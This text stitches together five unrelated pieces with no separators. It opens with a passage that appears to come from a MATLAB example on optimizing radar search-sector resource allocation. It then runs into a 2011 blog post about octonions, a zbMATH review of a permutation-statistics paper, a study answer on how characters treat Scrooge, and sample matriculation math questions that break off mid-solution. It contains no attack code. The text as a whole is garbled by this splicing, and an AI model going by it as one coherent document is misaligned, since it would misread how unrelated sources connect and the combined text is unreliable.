volume of a search sector and the `radareqsearchsnr` function to solve the radar search equation for $SN{R}_{m}$. Then use the `helperCumulativeDetectionProbability` function to compute the cumulative detection probability as a function of the target range given the found $SN{R}_{m}$. First, assume that the system noise temperature is the same for each search sector and is equal to 913 K. ```% System noise temperature (K) Ts = [913 913 913];``` Then, set the operational loss term for each sector. ```% Operational loss (dB) Loss = [22 19 24];``` Accurate estimation of the operational loss term is critical to the use of the radar equation. It corrects for the assumption of an ideal system and an ideal environment. The operational loss includes contributions that account for environmental conditions, target positional uncertainty, scan loss, hardware degradation, and many other factors typically totaling $\approx 20$ dB or more [1, 2]. For more information on losses that must be included in the radar equation refer to Introduction to Introduction to Pulse Integration and Fluctuation Loss in Radar, Introduction to Scanning and Processing Losses in Pulse Radar, and Modeling the Propagation of Radar Signals examples. Set the radial speed of the target to 250 m/s and the target RCS to 1 m². This example assumes that the radar is searching for the same kind of target in all three search sectors. In practice, the radial velocity and the RCS of a typical target of interest can be different for each search sector. ```% Target radial speed (m/s) [searchSectorParams.TargetRadialSpeed] = deal(250); % Target RCS (m²) [searchSectorParams.TargetRCS] = deal(1);``` Finally, set the false alarm probability to 1e-6. ```% Probability of false alarm [searchSectorParams.FalseAlarmProbability] = deal(1e-6);``` Consider different values of the PAP allocated to each sector. ```% Allocated PAP (W*m^2) pap = [20 40 80];``` Compute the cumulative probability of detection. ```% Target range R = 20e3:0.5e3:80e3; % Search sector volume (sr) sectorVolume = zeros(M, 1); figure tiledlayout(3, 1, 'TileSpacing', 'tight') for i = 1:M % Volume of the search sector sectorVolume(i) = solidangle(searchSectorParams(i).AzimuthLimits, searchSectorParams(i).ElevationLimits); % Store loss and system noise temperature in the sector parameters % struct searchSectorParams(i).OperationalLoss = Loss(i); searchSectorParams(i).SystemNoiseTemperature = Ts(i); % SNR at the sector's range limit SNRm = radareqsearchsnr(searchSectorParams(i).RangeLimit, pap, sectorVolume(i), searchSectorParams(i).FrameTime,... 'RCS', searchSectorParams(i).TargetRCS, 'Ts', searchSectorParams(i).SystemNoiseTemperature, 'Loss', searchSectorParams(i).OperationalLoss); % Cumulative probability of detection Pc = helperCumulativeDetectionProbability(R, SNRm, searchSectorParams(i)); % Plot ax = nexttile; colororder(flipud(ax.ColorOrder)); hold on plot(R*1e-3, Pc, 'LineWidth', 2) xline(searchSectorParams(i).RangeLimit*1e-3, ':', 'LineWidth', 1.2, 'Color', 'k', 'Alpha', 1.0) yline(0.9, 'LineWidth', 1.2, 'Alpha', 1.0) ylabel('P_c') title(sprintf('%s Sector', searchSectorParams(i).SectorName)) grid on xlim([20 80]) ylim([-0.05 1.05]) end xlabel('Target range (km)') legendStr = {sprintf('PAP=%.0f (W·m²)', pap(1)), sprintf('PAP=%.0f (W·m²)', pap(2)), sprintf('PAP=%.0f (W·m²)', pap(3))}; legend([legendStr 'Range limit', 'P_c = 0.9'], 'Location', 'southoutside', 'Orientation', 'horizontal', 'NumColumns', 3)``` Beyond the sector's range limit a target is undetectable and the cumulative detection probability is zero. Starting at the sector's range limit, as the target approaches the radar, the number of detection attempts increases with each scan. Thus, the cumulative detection probability increases as the target range decreases. By varying the allocated PAP for each sector, the radar can vary the ${R}_{90}$ range. #### Cumulative Detection Range The range ${R}_{90}$ at which the cumulative detection probability equals 0.9, can be found by numerically solving equation ${P}_{c}\left(R\right)-0.9=0$ with respect to the range variable $R$. Compute ${R}_{90}$ in each sector as the function of the allocated PAP. ```% The desired cumulative detection probability in the sector [searchSectorParams.CumulativeDetectionProbability] = deal(0.9); % Power-aperture product (W·m²) PAP = 1:2:600; % Range at which the cumulative detection probability is equal to the % desired value R90 = zeros(M, numel(PAP)); str1 = cell(1, M); str2 = cell(1, M); for i = 1:M for j = 1:numel(PAP) % SNR at the sector's range limit SNRm = radareqsearchsnr(searchSectorParams(i).RangeLimit, PAP(j), sectorVolume(i), searchSectorParams(i).FrameTime,... 'RCS', searchSectorParams(i).TargetRCS, 'Ts', searchSectorParams(i).SystemNoiseTemperature, 'Loss', searchSectorParams(i).OperationalLoss); % Cumulative detection probability at the range r % minus the required value of 0.9 func = @(r)(helperCumulativeDetectionProbability(r, SNRm, searchSectorParams(i))- searchSectorParams(i).CumulativeDetectionProbability); % Solve for range options = optimset('TolX', 0.0001); R90(i, j) = fzero(func, [1e-3 1] * searchSectorParams(i).RangeLimit, options); end str1{i} = sprintf('R_{90} (%s)', searchSectorParams(i).SectorName); str2{i} = sprintf('Range limit (%s)', searchSectorParams(i).SectorName); end % Plot figure hold on hl = plot(PAP, R90*1e-3, 'LineWidth', 2); hy = yline([searchSectorParams.RangeLimit]*1e-3, ':', 'LineWidth', 1.5, 'Alpha', 1.0); [hy.Color] = deal(hl.Color); xlabel('Power-aperture product (W·m²)') ylabel('R_{90} (km)') ylim([0 80]) legend([str1 str2], 'Location', 'southeast') title('Search Task Quality vs. Resource') grid on``` This result shows for each search sector the dependence of the search task quality,${R}_{90}$, on the allocated resource, the PAP. The RRM can allocate less or more PAP to a search sector to decrease or increase the effective value of ${R}_{90}$. However, as the allocated PAP increases, ${R}_{90}$ approaches the asymptotic value bounded by the sector's range limit. If ${R}_{90}$ is already close to the sector's range limit, allocating more PAP to the sector will not provide any significant increase in the search task quality. The QoS optimization problem seeks to find a resource allocation that jointly optimizes search quality across all sectors. Since the different values of ${R}_{90}$ can be desirable by different search sectors, simply maximizing the sum of the cumulative detection ranges will not result in a fair resource allocation. In that case search sectors with large ${R}_{90}$ will contribute significantly more to the objective function dominating search sectors with smaller ${R}_{90}$. To account for differences in the desired values of ${R}_{90}$ across the sectors, the QoS optimization problem first maps the quality metric to a utility. The utility describes the degree of satisfaction with how the search task is performing. The joint utility can be maximized by first weighting and then summing the utilities of the individual tasks. A simple utility function for a search task can be defined as follows [4] `${u}_{i}\left({R}_{90}\right)=\left\{\begin{array}{c}\begin{array}{lll}0,& & {R}_{90}<{R}_{{t}_{i}}\\ \frac{{R}_{90}-{R}_{{t}_{i}}}{{R}_{{o}_{i}}-{R}_{{t}_{i}}},& & {R}_{{t}_{i}}\le {R}_{90}\le {R}_{{o}_{i}}\\ 1,& & {R}_{90}>{R}_{{o}_{i}}\end{array}\end{array}$` where ${R}_{{t}_{i}}$ and ${R}_{{o}_{i}}$ are respectively the threshold and the objective value for ${R}_{90}$ in the sector $i$. The objective determines the desired detection performance for a search sector, while the threshold is a value of the cumulative detection range below which the search task performance is considered unsatisfactory. The intuition behind this utility function is that if the task's quality is above the objective, allocating more resources to this task is wasteful since it will not increase the overall system's satisfaction with the search performance. Similarly, if the quality is below the threshold the utility is zero, and the RRM should allocate resources to the task only when it has enough resources to make the utility positive. The sector's utility is always between 0 and 1 regardless of the ${R}_{90}$ which makes it convenient to weight and add utilities across the sectors to obtain the joint utility for the surveillance function. Define sets of ${R}_{90}$ objective and threshold values for each search sector. ```% Objective range for each sector Ro = [38e3 65e3 45e3]; % Threshold range for each sector Rt = [25e3 45e3 30e3];``` Create a utility function for each search sector using `helperUtilityFunction` and then plot it against the ${R}_{90}$ range. ```% Ranges at which evaluate the utility functions r90 = 0:1e3:80e3; figure tiledlayout(3, 1, 'TileSpacing', 'tight') for i = 1:M % Store threshold and objective values for cumulative detection range % in the sector parameters struct searchSectorParams(i).ThresholdDetectionRange = Rt(i); searchSectorParams(i).ObjectiveDetectionRange = Ro(i); % Evaluate and plot the utility at different ranges ax = nexttile; colors = ax.ColorOrder; hold on plot(r90*1e-3, helperUtilityFunction(r90, Rt(i), Ro(i)), 'LineWidth', 2, 'Color', colors(i, :)) ht = xline(Rt(i)*1e-3, '-.', 'Color', 'k', 'LineWidth', 1.2, 'Alpha', 1.0); ho = xline(Ro(i)*1e-3, '--', 'Color', 'k', 'LineWidth', 1.2, 'Alpha', 1.0); ylabel('Utility') ylim([-0.05 1.05]) title(sprintf('%s Sector', searchSectorParams(i).SectorName)) grid on end xlabel('R_{90} (km)') legend([ht ho], {'Threshold R_{90}', 'Objective R_{90}'}, 'Location', 'southoutside', 'Orientation', 'horizontal')``` Using these utility functions, the PAP (the resource) can be mapped to the utility. ```figure hold on for i = 1:M plot(PAP, helperUtilityFunction(R90(i, :), Rt(i), Ro(i)), 'LineWidth', 2) end xlabel('Power-aperture product (W·m²)') ylabel('Utility') ylim([-0.05 1.05]) title('Utility vs. Resource') grid on legend({searchSectorParams.SectorName}, 'Location', 'best')``` The long-range and the high-elevation sectors require about 50 W·m² of PAP to have a non-zero utility. At the same time, the utility of the horizon sector is maximized at 75 W·m² and allocating more PAP will not improve the objective of the QoS optimization problem. Overall, the horizon and the high-elevation sectors require less PAP than the long-range sector to achieve the same utility. #### Utility Under Normal Operational Conditions Assume that under the normal operational conditions the maximum utility is achieved in each search sector. In this case the RRM does not need to optimize the resource allocation. Each sector uses a nominal amount of resources enough to satisfy the corresponding objective requirement for the cumulative detection range. Compute the PAP needed to achieve the maximum utility in each sector. First, find the SNR needed to achieve the cumulative probability of detection of 0.9 at the objective value of ${R}_{90}$. Then use the `radareqsearchpap` function to solve the power-aperture form of the radar search equation to find the corresponding values of the PAP for the sectors. ```% Power-aperture product maxUtilityPAP = zeros(1, M); for i = 1:M % Cumulative detection probability at the range Ro minus the required % value func = @(snr)(helperCumulativeDetectionProbability(Ro(i), snr, searchSectorParams(i)) ... - searchSectorParams(i).CumulativeDetectionProbability); % Solve for SNR options = optimset('TolX', 0.0001); snr = fzero(func, [-20 30], options); % PAP needed to make R90 equal to the objective range Ro maxUtilityPAP(i) = radareqsearchpap(searchSectorParams(i).RangeLimit, snr, sectorVolume(i), searchSectorParams(i).FrameTime,... 'RCS', searchSectorParams(i).TargetRCS, 'Ts', searchSectorParams(i).SystemNoiseTemperature, 'Loss', searchSectorParams(i).OperationalLoss); end maxUtilityPAP``` ```maxUtilityPAP = 1×3 74.0963 421.6264 247.2635 ``` The total amount of the PAP used by the surveillance function under the normal operation conditions is a sum of the maximum utility PAP values used by each sector. ```% Total PAP needed for search under the normal operational conditions normalSearchPAP = ceil(sum(maxUtilityPAP))``` ```normalSearchPAP = 743 ``` Use the provided `helperDrawSearchSectors` helper function to visualize the radar search sectors. This function also plots the objective value of ${R}_{90}$ for each sector - the cumulative detection range corresponding to the maximum utility. Use the bar chart to plot the PAP allocated to the sectors. ```figure tiledlayout(1, 6, 'TileSpacing', 'loose') ax1 = nexttile([1 5]); helperDrawSearchSectors(ax1, searchSectorParams, true); title('MPAR Search Sectors Under Normal Operational Conditions') nexttile bar(categorical("Normal conditions"), maxUtilityPAP, 'stacked') set(gca(), 'YAxisLocation', 'right') ylabel('Power-aperture product (W·m²)') title('Resource Allocation') grid on``` #### Solution to QoS Optimization Problem Under the normal operational conditions all search tasks operate at the maximum utility, resulting in the cumulative detection range being equal or exceeding the objective value in each search sector. Since the total amount of resources available to MPAR is finite, activities of other radar functions such as tracking, maintenance, or communication, as well as system errors and failures can impose new constraints on the amount of resources accessible to the surveillance function. These deviations from the normal operational conditions prompt the RRM to recompute the resource allocations to the search tasks such that the new constraints are met, and the weighted utility is again maximized across all sectors. The QoS optimization problem can be solved numerically using the `fmincon` function from the Optimization Toolbox™. Set the sector priority weights such that the horizon sector has the highest priority, and the long-range sector has the lowest. ```% Sector priority weights w = [0.55 0.15 0.3];``` Normalize the sector weights such that they add up to 1. `w = w/sum(w);` Assume that the surveillance function has access to only 50% of the PAP used for search under the normal operational conditions. `searchPAP = 0.5*normalSearchPAP` ```searchPAP = 371.5000 ``` Set up the objective and the constraint functions. ```% Objective function fobj = @(x)helperQoSObjective(x, searchSectorParams, w); % Constraint fcon = @(x)helperQoSConstraint(x, searchPAP); ``` Set the lower and the upper bound on the QoS solution. ```% Lower bound on the QoS solution LB = 1e-6*ones(M, 1); % Upper bound on the QoS solution UB = maxUtilityPAP;``` As the initial point for the optimization distribute the available PAP according to the sector priority weights. ```% Starting points startPAP = w*searchPAP;``` Show the summary of the search sector parameters used to set up the QoS optimization problem. `helperSectorParams2Table(searchSectorParams)` ```ans=12×4 table Parameter Horizon Long-range High-elevation __________________________________ ______________ ______________ ______________ {'AzimuthLimits' } {2x1 double } {2x1 double } {2x1 double } {'ElevationLimits' } {2x1 double } {2x1 double } {2x1 double } {'RangeLimit' } {[ 40000]} {[ 70000]} {[ 50000]} {'FrameTime' } {[ 0.5000]} {[ 6]} {[ 2]} {'OperationalLoss' } {[ 22]} {[ 19]} {[ 24]} {'SystemNoiseTemperature' } {[ 913]} {[ 913]} {[ 913]} {'CumulativeDetectionProbability'} {[ 0.9000]} {[ 0.9000]} {[ 0.9000]} {'FalseAlarmProbability' } {[1.0000e-06]} {[1.0000e-06]} {[1.0000e-06]} {'TargetRCS' } {[ 1]} {[ 1]} {[ 1]} {'TargetRadialSpeed' } {[ 250]} {[ 250]} {[ 250]} {'ThresholdDetectionRange' } {[ 25000]} {[ 45000]} {[ 30000]} {'ObjectiveDetectionRange' } {[ 38000]} {[ 65000]} {[ 45000]} ``` Use `fmincon` to find an optimal resource allocation. ```options = optimoptions('fmincon', 'Display', 'off'); papAllocation = fmincon(fobj, startPAP, [], [], [], [], LB, UB, fcon, options)``` ```papAllocation = 1×3 74.0879 114.0102 183.4018 ``` Verify that this allocation satisfies the constraint and does not exceed the available PAP amount. `sum(papAllocation)` ```ans = 371.5000 ``` Given the found PAP allocations for each sector, compute ${R}_{90}$ and the corresponding value of the utility. `[~, optimalR90, utility] = helperQoSObjective(papAllocation, searchSectorParams, w)` ```optimalR90 = 1×3 104 × 3.8000 5.4581 4.3006 ``` ```utility = 1×3 1.0000 0.4791 0.8671 ``` For the horizon sector, plot the found optimal resource allocation on the PAP vs. ${R}_{90}$ curve and the corresponding utility value on the utility vs. ${R}_{90}$ curve. ```helperPlotR90AndUtility(PAP, R90(1, :), searchSectorParams(1), papAllocation(1), optimalR90(1), maxUtilityPAP(1), '#0072BD'); sgtitle({sprintf('%s Sector', searchSectorParams(1).SectorName), '(High Priority)'})``` These plots visualize the two-step transformation performed inside the QoS optimization. The first step computes ${R}_{90}$ from the PAP, while the second step computes the utility from ${R}_{90}$. To follow this transformation, start on the y-axis of the top subplot and choose a PAP value. Then find the corresponding point on the PAP vs. ${R}_{90}$ curve. Mark the ${R}_{90}$ value of this point on the x-axis. Using this ${R}_{90}$ value find a point on the utility curve in the bottom subplot. Finally, find the corresponding utility on the y-axis of the bottom subplot. The same set of steps can be traced in reverse to go from the utility to the PAP. The surveillance function in this example is set up such that the horizon sector has the highest priority. It also requires much smaller PAP to achieve the objective ${R}_{90}$ compared to the other two sectors. The QoS optimization allocates 74.1 W·m² of PAP to the horizon sector. This is equal to the amount allocated to this sector under the normal operational conditions, resulting in the horizon sector utility approaching 1. Plot the optimization results for the long-range and the high-elevation sectors. ```helperPlotR90AndUtility(PAP, R90(2, :), searchSectorParams(2), papAllocation(2), optimalR90(2), maxUtilityPAP(2), '#D95319'); sgtitle({sprintf('%s Sector', searchSectorParams(2).SectorName), '(Low Priority)'})``` ```helperPlotR90AndUtility(PAP, R90(3, :), searchSectorParams(3), papAllocation(3), optimalR90(3), maxUtilityPAP(3), '#EDB120'); sgtitle({sprintf('%s Sector', searchSectorParams(3).SectorName), '(Medium Priority)'})``` The QoS optimization allocates 114.2 W·m² and 183.25 W·m² to the long-range and the high-elevation sectors respectively. This allocation results in ${R}_{90}$ of about 55 km in the long-range sector, which corresponds to the utility of 0.5. The ${R}_{90}$ range in the high-elevation sector is equal to 43 km and the utility is about 0.87. The high-elevation sector is favored by the QoS optimization over the long-range sector because the corresponding sector priority weight is higher. Use the provided `helperDrawSearchSectors` helper function to visualize the radar search sectors with the optimal value of ${R}_{90}$ obtained from the QoS optimization. Then use the bar chart to plot the computed optimal PAP allocation and compare it to the PAP allocation under the normal operational conditions. ```figure tiledlayout(1, 6, 'TileSpacing', 'compact') ax1 = nexttile([1 5]); helperDrawSearchSectors(ax1, searchSectorParams, false, optimalR90); title('MPAR Search Sectors When 50% of PAP Is Available') nexttile ax2 = bar(categorical(["Normal conditions", "50% available"]), [maxUtilityPAP; papAllocation], 'stacked'); set(gca(), 'YAxisLocation', 'right') ylabel('Power-aperture product (W·m²)') title('Resource Allocation') grid on``` #### Conclusions This example develops a resource management scheme for the surveillance function of an MPAR with multiple search sectors. The example starts by defining parameters of three search sectors: horizon, long-range, and high-elevation. It then introduces the QoS optimization problem as a resource allocation scheme. The cumulative detection range is used as a performance measure describing the quality of a search task and the utility functions based on the threshold and objective values are used to map the quality into the utility space. Finally, the example shows how to solve the QoS optimization problem numerically to obtain the optimal allocation of PAP to the search sectors. #### References 1. James A. Scheer, William L. Melvin, Principles of Modern Radar: Radar Applications, Volume 3. United Kingdom: Institution of Engineering and Technology, 2013. 2. Barton, David Knox. Radar equations for modern radar. Artech House, 2013. 3. Charlish, Alexander, Folker Hoffmann, Christoph Degen, and Isabel Schlangen. “The Development From Adaptive to Cognitive Radar Resource Management.” IEEE Aerospace and Electronic Systems Magazine 35, no. 6 (June 1, 2020): 8–19. 4. Hoffmann, Folker, and Alexander Charlish. "A resource allocation model for the radar search function." In 2014 International Radar Conference, pp. 1-6. IEEE, 2014. #### Supporting Functions `helperSearchSector` Creates a struct with placeholders for search sector parameters. `type('helperSearchSector.m')` ```function searchSector = helperSearchSector() searchSector = struct('SectorName', [], 'AzimuthLimits', [], 'ElevationLimits', [], 'RangeLimit', [], ... 'FrameTime', [], 'OperationalLoss', [], 'SystemNoiseTemperature', [], ... 'CumulativeDetectionProbability', [], 'FalseAlarmProbability', [], 'TargetRCS', [], ... 'TargetRadialSpeed', [], 'ThresholdDetectionRange', [], 'ObjectiveDetectionRange', []); end ``` `helperCumulativeDetectionProbability` Compute cumulative detection probability given range, SNR at the sector's range limit, and sector parameters. `type('helperCumulativeDetectionProbability.m')` ```function Pc = helperCumulativeDetectionProbability(R, SNRm, searchSector) % The expectation and the dependency of the number of scans N on the target % range make the exact computation of the cumulative detection probability % difficult. Instead, it could be conveniently approximated by linearly % interpolating the lower bound expression % % P_c(R) >= 0, when R <= Rm && R > Rm - dR % P_c(R) >= 1 - prod(1 - P_d(Rm - n*dR)), when R <= Rm - n*dR and n = 1:N % % computed at ranges Rm-k*dR, k=0,1,... % Normalize range to the target popup range R = R/searchSector.RangeLimit; % Normalized target closure range dR = searchSector.FrameTime*searchSector.TargetRadialSpeed/searchSector.RangeLimit; Pfa = searchSector.FalseAlarmProbability; SNRm = db2pow(SNRm(:).'); M = numel(SNRm); Pc = zeros(numel(R), M); idxs = R < 1; r = R(idxs); N = numel(r); p = zeros(N, M); for i = 1:N range = (1:-dR:max(r(i)-dR, 0)).'; if dR > r(i) && range(end) ~= 0 range = [range; 0]; end Pd = zeros(numel(range), M); SNR = (range(2:end).^(-4))*SNRm; Pd(2:end,:) = 1 - cumprod(1 - Pfa.^(1./(1+SNR)), 1); p(i, :) = interp1(range, Pd, r(i)); end Pc(idxs, :) = p; end ``` `helperUtilityFunction` Utility function. `type('helperUtilityFunction.m')` ```function u = helperUtilityFunction(r, Rt, Ro) u = zeros(size(r)); idxo = r > Ro; u(idxo) = 1; idxt = r < Rt; u(idxt) = 0; idxs = ~idxo & ~idxt; u(idxs) = (r(idxs)-Rt)/(Ro-Rt); end ``` `helperWeightedUtility` Function that returns weighted utility given PAP allocations, sectors weights, and sector parameters. `type('helperQoSObjective.m')` ```function [val, R90, utility] = helperQoSObjective(papAllocation, searchSectorParams, weights) val = 0; M = numel(searchSectorParams); R90 = zeros(1, M); utility = zeros(1, M); for i = 1:M if papAllocation(i) > 0 sectorVolume = solidangle(searchSectorParams(i).AzimuthLimits, searchSectorParams(i).ElevationLimits); snr = radareqsearchsnr(searchSectorParams(i).RangeLimit, papAllocation(i), sectorVolume, searchSectorParams(i).FrameTime, ... 'RCS', searchSectorParams(i).TargetRCS, 'Ts', searchSectorParams(i).SystemNoiseTemperature, 'Loss', searchSectorParams(i).OperationalLoss); func = @(r)(helperCumulativeDetectionProbability(r, snr, searchSectorParams(i)) - searchSectorParams(i).CumulativeDetectionProbability); options = optimset('TolX', 0.00001); R90(i) = fzero(func, [1e-6 1] * searchSectorParams(i).RangeLimit, options); utility(i) = helperUtilityFunction(R90(i), searchSectorParams(i).ThresholdDetectionRange, searchSectorParams(i).ObjectiveDetectionRange); val = val - weights(i)*utility(i); end end end ``` helperConstraintPAP Function that defines the constraint on the PAP. `type('helperQoSConstraint.m')` ```function [c, ceq] = helperQoSConstraint(pap, total) c = []; ceq = sum(pap) - total; end ```
## Saturday, April 30, 2011 ### War of the Octonions Forgot the String Wars, sometimes called the Loop vs String Wars, or better known in the modern era as the Woit-Motl War? Well, fret not, it's back! At the center of the action is a piece written by John Baez and John Huerta in the current issue of Scientific American. Of course, Peter Woit and Lubos Motl weigh in. Why not? Peter Woit's take, and some very interesting responses by John Baez, can be found at Woit's weblog Not Even Wrong, here . Lubos Motl's strong disagreements at his weblog The Reference Frame can be found, here. For a brief review (or an elementary education, even) for those who don't know what an Octonion is, it's one of 4 division algebras, the first one being the ordinary elementary algebra taught in high school (REAL), the second (COMPLEX) known to Calculus students and Engineers and Scientists worldwide, the other two (Quaternions and Octonions) being a bit more involved. For comparison purposes, they take the forms: R = a C = a + bi H = a + bi + cj + dk O = a + e1i  + e2j +e3k + e4l + e5m + e6n + e7o  , or something. In any event, it's just notation folks, don't let it scare you. The following probably has nothing to do with the above, but I ran into it looking for a cool picture for this post, rather than say just copying Lubos'. It's from Marni Dee Sheppeard's Arcadian Pseudofunctor: Feb. 7, 2011: ### Theory Update 61 In this supercool paper, the authors define a tripled Fano plane(yes, that's right, three copies of Furey's particle zoo). It describes a set of $21=3×7$ (left cyclic) modules over a noncommutative ring on eight elements. The ring is given by the upper triangular $2×2$ matrices over the field with two elements. Similarly for right cyclic modules. The authors are familiar with the connection between octonion physics and so called stringy black holes. They find it odd that this structure is not studied in physics.
# zbMATH — the first resource for mathematics Statistics on wreath products, perfect matchings, and signed words. (English) Zbl 1063.05009 Summary: We introduce a natural extension of R. M. Adin, B. Brenti, and Y. Roichman’s major-index statistic nmaj on signed permutations [Adv. Appl. Math. 27, 210–224 (2001; Zbl 0995.05008)] to wreath products of a cyclic group with the symmetric group. We derive “insertion lemmas” which allow us to give simple bijective proofs that our extension has the same distribution as another statistic on wreath products introduced by R. M. Adin and Y. Roichman [Eur. J. Comb. 22, 431–446 (2001; Zbl 1058.20031)] called the flag major index. We also use our insertion lemmas to show that nmaj, the flag major index, and an inversion statistic have the same distribution on a subset of signed permutations in bijection with perfect matchings. We show that this inversion statistic has an interpretation in terms of $$q$$-counting rook placements on a shifted Ferrers board. Many results on permutation statistics extend to results on multiset permutations (words). We derive a number of analogous results for signed words, and also words with higher-order roots of unity attached to them. ##### MSC: 05A15 Exact enumeration problems, generating functions 05A05 Permutations, words, matrices ##### Keywords: Major-index statistics; rook theory; permutation statistics Full Text: ##### References: [1] Adin, R.M.; Brenti, F.; Roichman, Y., Descent numbers and major indices for the hyperoctahedral group, Adv. appl. math., 27, 210-224, (2001) · Zbl 0995.05008 [2] Adin, R.M.; Roichman, Y., The flag major index and group actions on polynomial rings, European J. combin., 22, 431-446, (2001) · Zbl 1058.20031 [3] Andrews, G.E., The theory of partitions, () · Zbl 0155.09302 [4] Bourbaki, N., Groupes et algèbres de Lie, (1968), Hermann Paris, (Chapters 4-6) [5] Foata, D., On the netto inversion number of a sequence, Proc. amer. math. soc., 19, 236-240, (1968) · Zbl 0157.03403 [6] Clarke, R.J.; Foata, D., Eulerian calculus. I. univariable statistics, European J. combin., 15, 345-362, (1994) · Zbl 0811.05069 [7] Clarke, R.J.; Foata, D., Eulerian calculus. II. an extension of han’s fundamental transformation, European J. combin., 16, 221-252, (1995) · Zbl 0822.05066 [8] Clarke, R.J.; Foata, D., Eulerian calculus. III. the ubiquitos Cauchy formula, European J. combin., 16, 329-355, (1995) · Zbl 0826.05058 [9] Foata, D.; Krattenthaler, C., Graphical major indices. II, Sém. lothar. combin., 34, (1995), Art. B34k, p. 16 (electronic) · Zbl 0855.05005 [10] Foata, D.; Schützenberger, M., Major index and inversion number of permutations, Math. nachr., 83, 143-159, (1978) · Zbl 0319.05002 [11] Haglund, J.; Remmel, J.B., Rook theory for perfect matchings, Adv. appl. math., 27, 438-481, (2001) · Zbl 1017.05015 [12] Humphreys, J.E., Reflection groups and Coxeter groups, (), (Chapter 3) · Zbl 0173.03001 [13] Kane, R., Reflection groups and invariant theory, (2001), Springer-Verlag New York · Zbl 0986.20038 [14] Knuth, D.E., () [15] MacMahon, Major P.A., () [16] Rawlings, D., The $$r$$-major index, J. combin. theory ser. A, 31, 175-183, (1981) · Zbl 0475.05005 [17] Reiner, V., Signed permutation statistics, European J. combin., 14, 553-567, (1993) · Zbl 0793.05005 [18] Reiner, V., Signed permutation statistics and cycle type, European J. combin., 14, 569-579, (1993) · Zbl 0793.05006 [19] Reiner, V., Upper binomial posets and signed permutation statistics, European J. combin., 14, 581-588, (1993) · Zbl 0793.05007 [20] Steingrimsson, E., Permutation statistics of indexed permutations, European J. combin., 15, 187-205, (1994) · Zbl 0790.05002 [21] Stanley, R.P., () This reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching.
# How did people treat Scrooge? Stave one People treated Scrooge with the utmost respect and deference. Note, this doesn't reflect how they saw him as a person, but rather how they behaved toward him. The people who weren't required to interact with Scrooge generally said nothing and did nothing. They looked the other way and tried to stay out of his path. No one who didn't have business with the man approached him. "Nobody ever stopped him in the street to say, with gladsome looks, My dear Scrooge, how are you? When will you come to see me?' No beggars implored him to bestow a trifle, no children asked him what it was o'clock, no man or woman ever once in all his life inquired the way to such and such a place, of Scrooge. Even the blind men's dogs appeared to know him; and when they saw him coming on, would tug their owners into doorways and up courts; and then would wag their tails as though they said, No eye at all is better than an evil eye, dark master!' Scrooge's nephew wanted nothing more than to include and spend time with him. A merry Christmas, uncle! God save you!' cried a cheerful voice. It was the voice of Scrooge's nephew, who came upon him so quickly that this was the first intimation he had of his approach. Bah!' said Scrooge, Humbug!' He had so heated himself with rapid walking in the fog and frost, this nephew of Scrooge's, that he was all in a glow; his face was ruddy and handsome; his eyes sparkled, and his breath smoked again. Christmas a humbug, uncle!' said Scrooge's nephew. You don't mean that, I am sure?' And his clerk..... You'll want all day to-morrow, I suppose?' said Scrooge. If quite convenient, sir.' It's not convenient,' said Scrooge, and it's not fair. If I was to stop half-a-crown for it, you'd think yourself ill-used, I'll be bound?' The clerk smiled faintly. And yet,' said Scrooge, you don't think me ill-used, when I pay a day's wages for no work.' The clerk observed that it was only once a year. A poor excuse for picking a man's pocket every twenty-fifth of December!' said Scrooge, buttoning his great-coat to the chin. `But I suppose you must have the whole day. Be here all the earlier next morning.' The clerk promised that he would; and Scrooge walked out with a growl. ##### Source(s) A Christmas Carol
2020 MATRICULATION EXAMINATION Sample Question Set (3) MATHEMATICS                        Time allowed: 3hours WRITE YOUR ANSWERS IN THE ANSWER BOOKLET. SECTION (A) (Answer ALL questions.) 1 (a).     Let $\displaystyle f:R\backslash \{\pm 2\}\to R$ be a function defined by $\displaystyle f(x)=\frac{{3x}}{{{{x}^{2}}-4}}$.Find the positive value of $z$ such that $f(z) = 1$. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}f(x)=\displaystyle \frac{{3x}}{{{{x}^{2}}-4}}\\[2ex]f(z)=1\\[2ex]\displaystyle \frac{{3z}}{{{{z}^{2}}-4}}=1\\[2ex]{{z}^{2}}-4=3z\\[2ex]{{z}^{2}}-3z-4=0\\[2ex](z+1)(z-4)=0\\[2ex]z=-1\ \text{or}\ z=4\\[2ex]\text{Since }z>0,\ z=4\end{array}$ 1(b).     If the polynomial $x^3 - 3x^2 + ax - b$ is divided by $(x - 2 )$ and $(x + 2)$, the remainders are $21$ and $1$ respectively. Find the values of $a$ and $b$. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Let}\ f(x)={{x}^{3}}-3{{x}^{2}}+ax-b\\[2ex]\text{When}\ f(x)\ \text{is divided by }(x-2),\ \\[2ex]\text{The remainder is }21.\\[2ex]f(2)=21\\[2ex]{{(2)}^{3}}-3{{(2)}^{2}}+a(2)-b=21\\[2ex]2a-b=25\ --------(1)\\[2ex]\text{When}\ f(x)\ \text{is divided by }(x+2),\ \\[2ex]\text{The remainder is }1.\\[2ex]f(-2)=1\\[2ex]{{(-2)}^{3}}-3{{(-2)}^{2}}+a(-2)-b=1\\[2ex]2a+b=-21\ --------(2)\\[2ex](1)+(2)\Rightarrow 4a=4\Rightarrow a=1\\[2ex](1)-(2)\Rightarrow -2b=46\Rightarrow b=-23\end{array}$ 2(a).     Find the middle term in the expansion of $(x^2 - 2y)^{10}$. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}{{(r+1)}^{{\text{th}}}}\ \text{term in the expansion of }{{({{x}^{2}}-2y)}^{{10}}}={}^{{10}}{{C}_{r}}{{\left( {{{x}^{2}}} \right)}^{{10-r}}}{{\left( {-2y} \right)}^{r}}\text{ }\\[2ex]\text{middle term in the expansion of }{{({{x}^{2}}-2y)}^{{10}}}={{6}^{{\text{th}}}}\ \text{term}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ ={{(5+1)}^{{\text{th}}}}\ \text{term}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ 